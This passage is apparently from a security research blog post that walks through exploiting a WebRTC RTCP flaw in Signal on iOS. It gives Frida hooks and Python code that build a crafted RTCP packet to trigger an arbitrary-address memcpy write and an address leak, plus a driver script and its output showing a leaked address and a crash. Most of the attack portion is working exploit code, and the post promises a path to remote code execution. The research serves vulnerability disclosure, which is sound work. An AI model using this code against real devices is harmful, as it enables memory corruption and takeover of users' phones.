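    return (address >> 32) & 0xFFFFFFFF, address & 0xFFFFFFFF


def swap32(value):
    """Byte-swap a 32-bit integer (assumed equivalent of Le32ToBe32)."""
    return struct.unpack("<I", struct.pack(">I", value))[0]


def parse_sdes_leak(packet, target_ssrc):
    """Return the leaked value as an int, or None if the SSRC does not
    match or the CNAME text is not valid hex."""
    if len(packet) < 6:
        return None
    # Read the SSRC the same way the hook does (little-endian u32 at offset 0)
    (ssrc,) = struct.unpack_from("<I", packet, 0)
    if ssrc != target_ssrc:
        return None
    # CNAME text starts 6 bytes in; stop at the NUL terminator or end of packet
    end = packet.find(b"\x00", 6)
    text = packet[6:end if end != -1 else len(packet)]
    try:
        # base 16 accepts the text with or without a leading "0x"
        return int(text.decode("ascii"), 16)
    except ValueError:
        return None
```

Bounding the scan by the packet length, rather than trusting the terminator, keeps a malformed reply from walking past the end of the buffer.
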
Triggering the memcpy

We take a different approach for the write primitive, primarily because the payload we send may be longer than a typical outgoing RTCP message. We instead hook SrtpTransport::SendRtcpPacket and create our own CopyOnWriteBuffer to replace its first argument. We leverage Frida’s ability to define and call arbitrary functions to mimic program flow for creating and modifying the buffer in the process’s memory:

/*
 * @description: callable function to create a packet using size and capacity
 * rtc::CopyOnWriteBuffer::CopyOnWriteBuffer(unsigned long, unsigned long)
 */
CopyOnWriteBuffer_Init = new NativeFunction(CopyOnWriteBuffer_Init,
                                            'pointer',
                                            ['pointer',
                                                'uint64',
                                                'uint64'
                                            ]);

// ...same for CopyOnWriteBuffer_SetSize and CopyOnWriteBuffer_AppendData... //

/*
 * @description: assembles manufactured payload to trigger the arb write.
 * @arguments:
 *  pload: ArrayBuffer payload which is the `src` data to be copied
 *  address: Int in little-endian indicating the `dst` for the copy
 *  len: Int in little-endian representing the length of the copy
 */
function writePayload(pload, address, len) {
    /* payload already created, no need to proceed */
    if (payload != null) {
        send({"key": "error", "str": "Payload already set"});
        return;
    }

    var bytes  = new Uint8Array(pload);
    var size = bytes.length;
    /*
     * the RTCP length field is the packet length in dwords, minus one
     * fixed portion is 4 dwords: the 4-byte RTCP header (version + fmt as u8,
     * type as u8, length as u16), the 8-byte address, and the 4-byte len
     * add one more dword to cover a payload that is not a multiple of 4 bytes
     */
    var count = Math.floor(size/4) + 4 - 1 + 1;
    var mbuf = Memory.alloc(256+size);

    /* RTCP header */
    /* version + has_padding + count_or_format_ */
    mbuf.add(0).writeU8((2<<6) + (0<<5) + (1 & 0x1f));
    /* packet_type_ */
    mbuf.add(1).writeU8(222);

    /* length as a 16-bit big-endian value (count can exceed 255) */
    mbuf.add(2).writeU8((count >> 8) & 0xff);
    mbuf.add(3).writeU8(count & 0xff);
    mbuf.add(4).writeU64(address);
    mbuf.add(0xc).writeU32(len);
    for (let i = 0; i < size; i++) {
        mbuf.add(0x10+i).writeU8(bytes[i]);
    }

    /* allocate memory for custom COW buffer */
    var cow = Memory.alloc(0x1000);
    /* initialize buffer with size of payload and large max size */
    CopyOnWriteBuffer_Init(cow, 4+4*count, 3000);
    /* reset pointer in buffer to 0 prior to appending data */
    CopyOnWriteBuffer_SetSize(cow, 0);
    /* append buffer to data (will copy into start of backing buffer and set size) */
    CopyOnWriteBuffer_AppendData(cow, mbuf, 4+4*count);
    if (debug) {
        send({"key": "debug", "function": "COW",
              "data": hexdump(ptr(cow),
              { length: 0x20 })})
        send({"key": "debug", "function": "Assembled payload:",
              "data": hexdump(ptr(cow).readPointer().add(0x10).readPointer(),
              { length: 4+4*count })})
    }
    payload = cow;
}

If we hot-swap an outgoing RTCP message with this constructed packet, we should expect the target to copy user-defined data to the address of our choosing!
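
The packet layout is easier to see outside of Frida. The following is a minimal Python sketch of the same bytes, assuming the layout used in `writePayload` above: a 4-byte RTCP header, the destination address as a little-endian u64 at offset 4, the copy length as a little-endian u32 at offset 0xc, and the payload from offset 0x10. The function name `build_write_packet` is hypothetical, and unlike the hook it pads to the next 32-bit boundary instead of always adding a spare word.

```python
import struct

RTCP_VERSION = 2
PACKET_TYPE = 222  # packet type written by the hook above


def build_write_packet(payload, address, length):
    """Assemble the bytes of an RTCP packet carrying a write request."""
    # dst address and copy length, little-endian like writeU64/writeU32 on ARM64
    body = struct.pack("<QI", address, length) + payload
    # RTCP packets are a whole number of 32-bit words, so zero-pad the tail
    body += b"\x00" * (-len(body) % 4)
    total_words = (4 + len(body)) // 4
    # version in the top two bits, no padding flag, count/format field of 1
    first = (RTCP_VERSION << 6) | (0 << 5) | (1 & 0x1F)
    # the length field is big-endian and holds the word count minus one
    header = struct.pack(">BBH", first, PACKET_TYPE, total_words - 1)
    return header + body
```

For example, `build_write_packet(b"\x41" * 1337, 0xdeadbeefdeadbeef, 1337)` produces a 1356-byte packet whose length field is 338, which is why the length needs both bytes of the 16-bit field.
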

Testing the Triggers

All the code for throwing these tests is in the frida_scripts directory of our repo.

As an exciting conclusion to this blog post, let’s confirm we can trigger the primitives. We wrap the Frida JavaScript files in a Python driver and use Frida’s send to communicate between the driver and injected hooks. A simple on_message handler in the driver manages this communication, triggering the read or write primitive depending on command line arguments:

    def on_message(self, message, data):
        """
        Frida onMessage handler for routing message and data to appropriate Driver handlers
        """
        if message["type"] == "error":
            if "description" in message and \
                    message["description"] == "Exiting Frida JS script":
                level = ""
            else:
                level = "err"
            log(message["description"], level)
            exit(1)
        if "key" in message["payload"]:
            key = message["payload"]["key"]
            if key == "CommandRequest":
                if self.target == "read":
                    log("Triggering read")
                    self.trigger_read()
                else:
                    log("Triggering write")
                    self.trigger_write()
            elif key == "notify":
                log(message["payload"]["notification"])
            elif key == "debug":
                log(message["payload"]["function"] + '\n' +
                    message["payload"]["data"].replace("\\n", "\n"), "debug")
            elif key == "LeakedAddr":
                addr = int(message["payload"]["val"])
                log("Leaked address " + hex(addr) + "!")
                self.cleanup()

    def trigger_read(self):
        """
        Trigger leak primitive by leaking the RTCPReceiver instance
        """

        mes = {"type": "command", "command": "read", "toSendUpper": None,
               "toSendLower": 0x4141}
        if self.debug:
            log("Sending leak message " + json.dumps(mes), "debug")
        self.script.post(mes)

    def trigger_write(self):
        """
        Trigger write primitive by supplying an arbitrary destination address. This will crash the process.
        """

        self.script.post(
            {
                "type": "command",
                "command": "write",
                "addr": 0xdeadbeefdeadbeef,
                "len": 1337,
            },
            b'\x41' * 1337
        )
        log("Check Xcode to confirm the process crashed due to an EXC_BAD_ACCESS")
        self.cleanup()

Start the target in Xcode, start the Android emulator and Frida using adb, and run the trigger.py script with the appropriate arguments:

# get the Android thrower device id using `frida-ls-devices`
python3 trigger.py -D emulator-5554 -t <read, write> -n <number>
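
The trigger.py in our repo is the authority on these options. Purely as an illustration, the three flags shown above could be parsed with `argparse` along the following lines; the `dest` names, help strings, and the `parse_args` helper are assumptions and not copied from the script.

```python
import argparse


def parse_args(argv=None):
    """Parse the thrower's command line (hypothetical sketch)."""
    parser = argparse.ArgumentParser(
        description="Trigger the injected read or write primitive")
    # Frida device id of the thrower, as listed by frida-ls-devices
    parser.add_argument("-D", dest="device", required=True,
                        help="Frida device id, e.g. emulator-5554")
    # which primitive to throw
    parser.add_argument("-t", dest="target", required=True,
                        choices=["read", "write"],
                        help="primitive to trigger")
    # number of the target to call
    parser.add_argument("-n", dest="number", required=True,
                        help="number of the target")
    return parser.parse_args(argv)
```

Restricting `-t` to `read` or `write` lets the parser reject typos before any Frida session is opened.
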

Throwing the read shows an address returned:

$ python3 trigger.py -D emulator-5554 -t read -n <number>
[+] Connected to Frida device
[+] Attaching to Signal on driver device
[+] Resuming Signal on driver device
[+] Loading Frida scripts
[+] Triggering primitive...
[+] Targeting <number>
[+] Triggering read
[+] Leaked address 0x11382ff40!

And throwing the write shows a crash in Xcode!

Fig 2: Triggering the vulnerable memcpy with a payload containing the 0xdeadbeefdeadbeef address crashes the target in Xcode. Xcode shows the crash at the vulnerable memcpy code with an EXC_BAD_ACCESS error. The address included in the error is 0xdeadbeefdeadc000, indicating our trigger successfully hit the vulnerable code.

Next Steps

In Part 2 of this series, we will plan our attack to turn these two primitives into RCE! To do so, we will dive into:

  • More WebRTC internals
  • iOS internals and the shared cache
  • Signal-iOS message database management
  • Corellium emulation
  • ROP in ARM64
